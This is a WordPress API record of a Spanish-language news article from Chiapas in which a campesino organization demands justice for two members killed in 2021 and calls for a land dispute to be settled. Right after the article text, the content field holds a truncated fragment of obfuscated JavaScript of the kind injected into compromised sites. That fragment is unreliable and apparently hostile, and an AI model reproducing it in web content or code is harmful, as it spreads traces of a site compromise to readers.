{"id":9906,"date":"2023-05-05T03:50:34","date_gmt":"2023-05-05T03:50:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9906"},"modified":"2023-05-05T03:50:35","modified_gmt":"2023-05-05T03:50:35","slug":"exige-justicia-para-companeros-asesinados-de-la-ocez-casa-del-pueblo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9906","title":{"rendered":"Exige justicia para compa\u00f1eros asesinados de la Ocez- Casa del Pueblo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"651\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM-651x1024.jpeg\" alt=\"\" class=\"wp-image-9907\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM-651x1024.jpeg 651w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM-191x300.jpeg 191w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM-768x1209.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM-976x1536.jpeg 976w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.27.49-PM.jpeg 1016w\" sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>04 de Mayo. Del 2023. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata Casa del Pueblo de Venustiano Carranza realizaron un pronunciamiento para conmemorar el segundo aniversario luctuoso de sus compa\u00f1eros Efra\u00edn Espinosa P\u00e9rez y Mario Alberto V\u00e1zquez Aguilar, asesinados en el 2021.\u201cFueron v\u00edctimas de una cobarde emboscada por parte del grupo narco paramilitar Alianza San Bartolom\u00e9 de Los Llanos, comandados principalmente por el Paraje Para\u00edso del Grijalva, contando con la participaci\u00f3n activa de la Guardia Nacional. \u201cAsimismo, el secuestro y tortura de 4 compa\u00f1eros m\u00e1s\u201d.\u201cA dos a\u00f1os de estos acontecimientos, los tres niveles de gobierno han tenido conocimiento pleno y han sido incapaces de darle una soluci\u00f3n definitiva, d\u00e1ndole largas a la comisi\u00f3n negociadora y administrando el problema agrario, con la intenci\u00f3n de desgastar a nuestra comunidad, faltando a su criterio de imparcialidad y capacidad para someter a los delincuentes que secuestraron, torturaron y asesinaron cobardemente a nuestros compa\u00f1eros\u201d, aseguran en un  comunicado.Por lo anterior, hacen un llamado a todas las organizaciones independientes, a los medios masivos de comunicaci\u00f3n y al pueblo en general, a mantenerse informados de los acontecimientos, a no dejarse enga\u00f1ar con las mentiras que este grupo dise\u00f1a hace circular en los medios masivos de comunicaci\u00f3n y las redes sociales.\u201cExigimos como comunidad se ejecute la \u00faltima resoluci\u00f3n tomada por nuestra Asamblea General, de otorgarle 4 mil hect\u00e1reas en usufructo para que sigan trabajando y que los narco paramilitares reconozcan las tierras que se les han comprado en los sexenios de los gobernadores Absal\u00f3n Castellanos Dom\u00ednguez, Patrocinio Gonz\u00e1lez Garrido y Juan Sabines Guti\u00e9rrez, que se encuentra en manos del gobierno estatal y federal, que sean capaces de darle soluci\u00f3n pronta y expedita, a que no se quede todo en puras palabras, para que exista una paz verdadera y duradera, tranquilidad en el municipio de Venustiano Carranza y las comunidades vecinas hostigadas por el paraje Paraiso del Grijalva (Laja Tendida, Plan de Los \u00c1ngeles. Santa Isabel Las Delicias, Rio Jord\u00e1n), y terminar con las amenazas hacia nuestra Comunidad Ind\u00edgena Tsotsil Bienes Comunales-Casa del Pueblo\u201d, concluyen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 04 de Mayo. Del 2023. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata Casa del Pueblo de Venustiano Carranza realizaron un pronunciamiento para conmemorar el segundo aniversario luctuoso de sus compa\u00f1eros Efra\u00edn Espinosa P\u00e9rez y Mario Alberto V\u00e1zquez Aguilar, asesinados en el 2021.\u201cFueron v\u00edctimas de una cobarde emboscada por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9907,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9906","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9906","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9906"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9906\/revisions"}],"predecessor-version":[{"id":9908,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9906\/revisions\/9908"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9907"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9906"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}